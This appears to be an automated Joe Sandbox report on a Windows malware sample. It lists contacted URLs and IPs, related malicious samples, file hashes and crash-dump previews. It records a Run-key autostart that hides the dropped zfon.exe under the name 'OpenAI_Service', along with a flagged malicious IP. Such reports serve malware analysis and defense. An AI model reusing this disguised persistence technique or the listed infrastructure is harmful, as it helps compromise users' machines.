                                                                                                    https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.battle.net/shop/simplecheckout/loadingzfon.exe, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.msn.com:443/en-us/feedexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://nydus.battle.net/App/nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003991000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.1991891496.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000000.1992853353.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drfalse
                                                                                                            high
                                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://www.msn.com/en-us/weather/topstories/accuweather-el-niexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              3.5.237.170
                                                                                                              unknownUnited States
                                                                                                              16509AMAZON-02USfalse
                                                                                                              3.5.239.146
                                                                                                              s3-r-w.ap-east-1.amazonaws.comUnited States
                                                                                                              16509AMAZON-02USfalse
                                                                                                              27.50.63.8
                                                                                                              unknownSingapore
                                                                                                              64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                                                              52.95.162.66
                                                                                                              unknownUnited States
                                                                                                              16509AMAZON-02USfalse
                                                                                                              52.95.160.78
                                                                                                              unknownUnited States
                                                                                                              16509AMAZON-02USfalse
                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1577407
                                                                                                              Start date and time:2024-12-18 13:04:52 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 10m 39s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:32
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:1
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:nrGkqbCyKP.exe
                                                                                                              renamed because original name is a hash value
                                                                                                              Original Sample Name:d7d253630a5c513c915b0c27650a3bbcd4b1918124f85185f3a330cb34aee89d.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.evad.winEXE@13/25@6/5
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 70%
                                                                                                              • Number of executed functions: 42
                                                                                                              • Number of non-executed functions: 333
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, UserOOBEBroker.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, audiodg.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, mobsync.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 204.79.197.203, 23.218.208.109, 20.12.23.50, 20.190.177.20, 2.16.158.75, 2.16.158.176, 13.107.246.63
                                                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, r.bing.com, a-0003.a-msedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, api-msn-com.a-0003.a-msedge.net
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • VT rate limit hit for: nrGkqbCyKP.exe
                                                                                                              TimeTypeDescription
                                                                                                              07:05:57API Interceptor9149x Sleep call for process: nrGkqbCyKP.exe modified
                                                                                                              07:06:50API Interceptor518x Sleep call for process: explorer.exe modified
                                                                                                              07:07:21API Interceptor101979x Sleep call for process: hh.exe modified
                                                                                                              13:06:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OpenAI_Service C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                              13:07:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OpenAI_Service C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              3.5.237.170https://www.tik0k.com/Get hashmaliciousUnknownBrowse
                                                                                                                3.5.239.146R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                                                                  Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                                                                    drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                      27.50.63.89Kdid5k13f.exeGet hashmaliciousUnknownBrowse
                                                                                                                        9Kdid5k13f.exeGet hashmaliciousUnknownBrowse
                                                                                                                          drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                            drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                              52.95.162.66sxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  s3-r-w.ap-east-1.amazonaws.comsxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 52.95.161.78
                                                                                                                                  R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 52.95.161.78
                                                                                                                                  drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 52.95.161.62
                                                                                                                                  GameBoxMini.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.236.11
                                                                                                                                  drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.237.31
                                                                                                                                  https://www.tik0k.com/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.237.170
                                                                                                                                  http://capitalhillblue.com/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.236.180
                                                                                                                                  Installer_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.237.31
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  AMAZON-02USsxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.237.31
                                                                                                                                  R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 52.95.161.78
                                                                                                                                  Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 44.247.24.192
                                                                                                                                  loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 18.255.125.151
                                                                                                                                  Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 52.95.161.78
                                                                                                                                  loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 13.121.254.215
                                                                                                                                  loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 34.242.60.208
                                                                                                                                  https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                                                                  • 13.227.8.115
                                                                                                                                  http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                                                                                                                  • 3.164.182.125
                                                                                                                                  AMAZON-02USsxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.237.31
                                                                                                                                  R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 52.95.161.78
                                                                                                                                  Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 44.247.24.192
                                                                                                                                  loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 18.255.125.151
                                                                                                                                  Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 52.95.161.78
                                                                                                                                  loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 13.121.254.215
                                                                                                                                  loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 34.242.60.208
                                                                                                                                  https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                                                                  • 13.227.8.115
                                                                                                                                  http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                                                                                                                  • 3.164.182.125
                                                                                                                                  AMAZON-02USsxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.237.31
                                                                                                                                  R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 52.95.161.78
                                                                                                                                  Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 44.247.24.192
                                                                                                                                  loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 18.255.125.151
                                                                                                                                  Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 52.95.161.78
                                                                                                                                  loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 13.121.254.215
                                                                                                                                  loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 34.242.60.208
                                                                                                                                  https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                                                                  • 13.227.8.115
                                                                                                                                  http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                                                                                                                  • 3.164.182.125
                                                                                                                                  BCPL-SGBGPNETGlobalASNSG9Kdid5k13f.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 27.50.63.8
                                                                                                                                  9Kdid5k13f.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 27.50.63.8
                                                                                                                                  3zhEXB7iUp.dllGet hashmaliciousUnknownBrowse
                                                                                                                                  • 118.107.29.172
                                                                                                                                  SGVKcFqU08.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 118.107.29.172
                                                                                                                                  i4VmSW2D4u.dllGet hashmaliciousUnknownBrowse
                                                                                                                                  • 118.107.29.172
                                                                                                                                  3zhEXB7iUp.dllGet hashmaliciousUnknownBrowse
                                                                                                                                  • 118.107.29.172
                                                                                                                                  i4VmSW2D4u.dllGet hashmaliciousUnknownBrowse
                                                                                                                                  • 118.107.29.172
                                                                                                                                  drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 27.50.63.8
                                                                                                                                  drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 27.50.63.8
                                                                                                                                  z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 202.95.11.110
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0esxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  Lu4421.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  Lu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  Memo - Impairment Test 2023 MEX010B (5).jsGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\MSVCP140.dllsxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        GameBoxMini.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            RQoBY766F5.exeGet hashmaliciousBabukBrowse
                                                                                                                                              RQoBY766F5.exeGet hashmaliciousBabukBrowse
                                                                                                                                                https://www.evergabe-online.de/installer/oba-light/oba-light_windows-x64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    1Gqt1JqOZN.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\VCRUNTIME140.dllsxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            GameBoxMini.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                net.zipGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                  SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                          Entropy (8bit):0.8459045172037963
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:peiOA0794addjMo+jfizuiFKZ24lO8Hj:giOb794addjMo+jqzuiFKY4lO8Hj
                                                                                                                                                                          MD5:5EB293D3D9BA916EC5B093BC8218D0E0
                                                                                                                                                                          SHA1:A67C45BC6E18BE31B0A003C2E0E7094FAF9A5B49
                                                                                                                                                                          SHA-256:2A19FFA46124F7654A9F20ECBBA81648C186718277BA8032A5E7B4819C1D97D2
                                                                                                                                                                          SHA-512:DC12C0A02B45D51EFD059A2A72F5F4F19703B1A1B6E5619EAA93CB622C756CA74B21779BD1776785B24C987812A57E0422FE7A6EB1DADC51CE78E6CA23500568
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.9.7.2.1.0.2.7.6.1.4.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.7.9.e.8.3.3.-.3.a.8.4.-.4.f.1.6.-.b.1.5.d.-.d.6.b.8.8.5.f.8.c.2.9.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.e.4.8.0.1.7.b.-.2.2.8.e.-.4.a.1.4.-.9.e.f.a.-.9.8.8.6.4.a.6.6.f.4.2.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.z.f.o.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.9.8.-.0.0.0.1.-.0.0.1.4.-.c.3.a.b.-.7.e.4.e.4.5.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.4.9.e.e.6.3.5.9.c.0.3.f.2.2.a.c.a.a.5.0.0.9.9.9.8.a.f.4.f.9.7.0.0.0.0.f.f.f.f.!.0.0.0.0.f.5.5.5.c.3.a.9.a.c.9.b.b.d.5.8.5.9.d.1.9.5.8.a.8.4.4.f.c.d.d.5.e.5.1.0.6.3.3.9.!.z.f.o.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.7././.0.8././.0.1.:.1.8.:.5.7.:.1.4.!.0.!.z.f.o.n...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                          Entropy (8bit):0.8112878344791874
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:PZyMOA0MZzepzddjMo+jfIzuiFKZ24lO8Hj:P4MObMte9ddjMo+jQzuiFKY4lO8Hj
                                                                                                                                                                          MD5:89298C6905E1960D3779A246FDCDACCE
                                                                                                                                                                          SHA1:2CE2AE91809CEFE95C38AF184035CD0E99ACD521
                                                                                                                                                                          SHA-256:4ACAED0C4B5F0251B6F3A1D6DF131261188A26B0D54EB50E5172E7F6E06A6CB7
                                                                                                                                                                          SHA-512:8FFF964BF0B494F09FE2FB74A71AB10E13613670FEE8721E3B3BBEFB090443E0FF73EF74D1796EA4FEF51F3E75F1F0B7CF29F5279A59B6463647D88FE3FE173B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.9.7.2.0.5.9.8.6.5.7.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.c.c.f.1.e.3.-.c.3.8.c.-.4.e.0.7.-.8.d.e.9.-.7.6.7.3.9.f.5.6.1.7.9.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.2.8.7.c.1.e.-.c.1.3.d.-.4.e.1.6.-.b.6.8.2.-.f.a.c.9.b.d.7.a.f.9.f.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.z.f.o.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.9.8.-.0.0.0.1.-.0.0.1.4.-.c.3.a.b.-.7.e.4.e.4.5.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.4.9.e.e.6.3.5.9.c.0.3.f.2.2.a.c.a.a.5.0.0.9.9.9.8.a.f.4.f.9.7.0.0.0.0.f.f.f.f.!.0.0.0.0.f.5.5.5.c.3.a.9.a.c.9.b.b.d.5.8.5.9.d.1.9.5.8.a.8.4.4.f.c.d.d.5.e.5.1.0.6.3.3.9.!.z.f.o.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.7././.0.8././.0.1.:.1.8.:.5.7.:.1.4.!.0.!.z.f.o.n...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.4.1.1.....I.s.F.a.t.a.l.
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 12:06:46 2024, 0x1205a4 type
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):58360
                                                                                                                                                                          Entropy (8bit):1.7216613218383623
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:598cJ3OG+OOxpOxx0eHTQ0pNHi7P6mBAulf1+vMJ0HG5554Y4kRCUeV62WInvIuS:0e+g0mNHOy61lQUJIYvZ7Dy4
                                                                                                                                                                          MD5:A71B2A33211F2B0A860181581F68E3B3
                                                                                                                                                                          SHA1:90BD200AE9550CB1D83E5C013FD0F35F4ED63A2C
                                                                                                                                                                          SHA-256:6D3B6B5C2FF5C1BC3F11E0F8C22176397873B638C58140B753C167074AEBCF89
                                                                                                                                                                          SHA-512:FCA5FD65161277846CD821712B4794DB1E9912A73203F8512C063086EA8B2C9E2849E8F39657E3658616F6A9DEF91AB3AAAEC5586D68511DB82CB2047C2EE78F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:MDMP..a..... ........bg........................h...........<...............r,..........`.......8...........T...........................L...........8...............................................................................eJ..............Lw......................T............bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):8490
                                                                                                                                                                          Entropy (8bit):3.694071039694842
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:R6l7wVeJ5WJh6Y9nOgmfteslapB889bjhqfwynBm:R6lXJIv6YNOgmfteXj8fp8
                                                                                                                                                                          MD5:C45F7204564C5AA79AD3F33792204DFC
                                                                                                                                                                          SHA1:E77A7A5094C3F781D4CB13428E1362B1696AD4D5
                                                                                                                                                                          SHA-256:1487FC4372EA210AF7C14F5F498F9BA246B441EE7F382B173D923F53702A8F22
                                                                                                                                                                          SHA-512:1C059117BBD2262585034F1A10678B528FD45BBF2F14755239FCEDCF6A4EF8AFB59D0ABC97B4E8BAF2745E7593C9E636A5DDEDE1CCA3CA0CE6AB8F51BDCAFC43
                                                                                                                                                                          Malicious:false
